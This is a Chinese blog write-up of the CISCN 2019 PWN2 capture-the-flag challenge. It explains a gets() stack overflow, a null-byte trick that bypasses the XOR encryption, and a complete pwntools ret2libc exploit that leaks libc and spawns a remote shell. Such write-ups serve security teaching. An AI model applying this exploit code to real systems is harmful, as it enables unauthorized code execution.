[CISCN 2019东北]PWN2题解

已于 2024-04-20 21:22:03 修改
阅读量918 收藏 17
点赞数 10
分类专栏: ctf ret2libc 文章标签: 网络攻击模型
于 2024-04-20 15:46:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XJQ100717/article/details/138001400
版权
文章讲述了在具有NX保护的程序中,通过栈溢出找到exploit的机会,利用puts函数实现ret2libc,最终获取shell的过程。作者详细描述了程序结构、溢出点和利用方法,展示了如何构造payload以绕过加密并执行系统调用。
摘要由CSDN通过智能技术生成

目录

思路

exp

结果

我觉得这道题还是比较好的,所以我就想着分享分享

思路

root@TOM:/mnt/c/users/32566/desktop# checksec pwn
[*] '/mnt/c/users/32566/desktop/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了nx保护,64位,拖入ida,进入main函数,我会给大家分析代码,这道题的亮点就在代码上。

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF
​
  init(argc, argv, envp);
  puts("EEEEEEE                            hh      iii                ");
  puts("EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  ");
  puts("EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e ");
  puts("EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  ");
  puts("EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee ");
  puts("====================================================================");
  puts("Welcome to this Encryption machine\n");
  begin(); 
  //int begin()
    //{
      //puts("====================================================================");
      //puts("1.Encrypt");
      //puts("2.Decrypt");
      //puts("3.Exit");
      //return puts("Input your choice!");
    //}   这是begin函数里面的内容
  while ( 1 )
  {
    while ( 1 )
    {
      fflush(0LL);
      v4 = 0;
      __isoc99_scanf("%d", &v4);
      getchar();
      if ( v4 != 2 )
        break;
      puts("I think you can do it by yourself");
      begin();
    }
    if ( v4 == 3 )
    {
      puts("Bye!");
      return 0;
    }
    if ( v4 != 1 )
      break;
    encrypt();
    begin();
  }
  puts("Something Wrong!");
  return 0;
}

此程序给你了三个选项分别是:1.Encrypt 2.Decrypt 3.Exit,假如你选择1,直接会进入加密部分,假如你选择2会让你重新选择,咱们进入encrypt看看

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]
​
  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xCu;
      }
      else
      {
        s[x] ^= 0xDu;
      }
    }
    else
    {
      s[x] ^= 0xEu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

你可以在里面看到gets函数,这个就是溢出点,假如你通过gets进行溢出的话,里面的内容是会被改变的。我刚开始做这道题的时候,问了一下chatgpt,栈溢出后程序是不是就崩坏了,我就这么想的,但是打的时候没打通,然后我查看Mr_Fmnwonwp,发现即使栈溢出了,它还是会将此程序执行完毕,然后我运行此程序发现确实是这样的。

root@TOM:/mnt/c/users/32566/desktop# cyclic 88
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaa
root@TOM:/mnt/c/users/32566/desktop# ./pwn
EEEEEEE                            hh      iii
EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee
EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e
EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee
EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee
====================================================================
Welcome to this Encryption machine
​
====================================================================
1.Encrypt
2.Decrypt
3.Exit
Input your choice!
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaa
Something Wrong!

你可以看到最后打印出来something wrong,目前我学的知识有限只能这样解释。这个是我问chatgpt的结果,看来和我想的一样。

做pwn的一些题,只开了nx保护,栈溢出后程序会执行完不?
​
chatgpt:在做一些 pwn 题目时,如果程序只开启了 NX (No eXecute) 保护,而没有启用其他保护机制(如堆栈随机化 ASLR、堆保护、堆栈保护等),在发生栈溢出时,程序可能会继续执行完毕。
​
开启 NX 保护会防止在可执行内存上执行恶意代码,但并不会阻止栈溢出。因此,如果程序存在栈溢出漏洞且只开启了 NX 保护,攻击者可以通过溢出覆盖返回地址等方式来控制程序的执行流程。在这种情况下,程序可能会执行攻击者精心构造的恶意代码,而不是正常的程序流程。
​
因此,如果在做 pwn 题目时,程序只开启了 NX 保护而没有其他保护机制,栈溢出后程序有可能继续执行完毕,但会执行攻击者注入的恶意代码,而不是原本的正常代码流。

那么gets后面的代码确实会被执行。后面进行的是加密操作;假如s[x] <= 96 || s[x] > 122 会接着执行里面的if条件语句,如果s[x] <= 96 || s[x] > 122 不成立,那么会将s[x] 与0xEu进行异或,假如 s[x] <= 64 || s[x] > 90不成立,则 s[x] 与0xDu进行抑或,假如s[x] > 47 && s[x] <= 57成立,会将s[x]与 0xCu进行异或,你也可以认为此为加密过程;if ( v0 >= strlen(s) )里面有一个strlen函数,这个是计算字符串长度的,在'\x00'处会停止,不包括'\x00'所以咱们可以构造一个空字符串来绕过加密,这样就不会对我们的payload进行造成破坏了。

没有后门函数;没有system,binsh有puts函数那么我们就可以用ret2libc

exp

from pwn import*
from LibcSearcher import*
context(os='linux',arch='amd64',log_level='debug')
#p=process('./pwn')
p=remote('node5.anna.nssctf.cn',22414)
elf=ELF('./pwn')
​
ret=0x00000000004006b9
rdi=0x0000000000400c83
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
encrypt_addr=elf.sym['encrypt']
​
​
p.recvuntil(b"Input your choice!\n")
p.sendline(b"1")
​
#gdb.attach(p)
payload=b'\x00'+cyclic(0x50+7)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt_addr)
p.recvuntil(b"Input your Plaintext to be encrypted\n")
p.sendline(payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("puts",hex(puts))
​
libc=LibcSearcher('puts',puts)
libc_base=puts-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
payload=b'\x00'+cyclic(0x50+7)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
p.sendline(payload)
p.interactive()

结果

链接:https://pan.baidu.com/s/1Pd6ZCdwuE_CasB52VcDdyQ?pwd=a61z 
提取码:a61z 假如你有typora应用的话,你可以用它看,比较美观。

[CISCN2019东北赛区]Web2
qq_42551635的博客
05-13 490
[CISCN2019东北赛区]Web2 前言 特别好的一道题,做完神清气爽,学到好多东西 知识点 xss 攻击获取cookie buu攻击平台 利用 cookie 获取管理员权限 获取到管理员cookie后,利用控制台中的application模块,修改页面cookie md5验证码哈希 import hashlib def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x
[CISCN 2019东北]PWN2
沈理大学牲的博客
11-20 383
p64(pop_ret_rdi_addr)+p64(bin_sh_addr):system函数的参数准备,即把'/bin/sh'的地址传入。p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+:输出puts函数的真实地址,用于后面的寻找libc。#'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量。#system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量。
【PWN · ret2libc】[CISCN 2019东北]PWN2
Mr_Fmnwon的博客
06-02 747
持续巩固ret2libc的做题范式/基本套路能力,同时也发现,reverse与pwn密不可分的联系。【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-CSDN博客这篇博客ret2libc的细节比较多,且这两个题目完全相似。
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1177
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
BUUCTF-[CISCN2019东北赛区]Web2
AndyNoel的博客
05-13 535
BUUCTF-[CISCN2019东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
【PWN · 栈迁移】[CISCN 2019东南]PWN2
Mr_Fmnwon的博客
10-14 429
当存在栈溢出但是溢出字符数并不多的情况下,可以尝试在别处构造rop链,通过栈迁移到目标内存区域,执行rop链。这里不讲栈迁移原理,仅是对题目的分析,适合对栈迁移有初步了解的童鞋食用。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【描述】"pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛"指出比赛的一个关键部分是"Pwn"类赛题。在信息安全竞赛中,Pwn通常指的是破解或漏洞利用类任务,要求参赛者发现并利用程序中的漏洞来获得控制...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[PWN] 栈迁移 ciscn_2019_es_2
LDX的博客
11-28 386
栈迁移 基础题目 理解 ciscn_2019_es_2
NSSCTF 刷题记录
红叶的博客
03-07 1196
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
BUUCTF--pwn--ciscn_2019_es_2【栈劫持】
qq_73149934的博客
12-14 281
BUUCTF--pwn--ciscn_2019_es_2【栈劫持】
暑假pwn训练 第(十一)国赛pwn
doudoudedi
08-16 1038
昨天做了几道pwn题emem 今天也做了2道表示pwn好难被打自闭了… 昨天重新做了一下国赛的pwn题发现好像能做几道…当时的自己也是真的菜~~ pwn1就是常规思路泄露libc然后getshell // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const c...
[BUUCTF]-PWN:ciscn_2019_es_2解析(栈迁移)
最新发布
2301_79326813的博客
12-11 1411
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过栈传参的,这样的形式是32位的调用函数的调用规则。
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1527
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
BUUCTF:[CISCN2019东北赛区]Web2
末初的CSDN博客
03-31 2717
BUUCTF:[CISCN2019东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2542
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
为什么scanf(“%d%d”,&a,&b)和scanf(“%d %d”,&a,&b);a和b的分隔符可以用空白字符??
weixin_42989773的博客
09-15 4481
# 欢迎使用Markdown编辑器写博客 本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I...
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值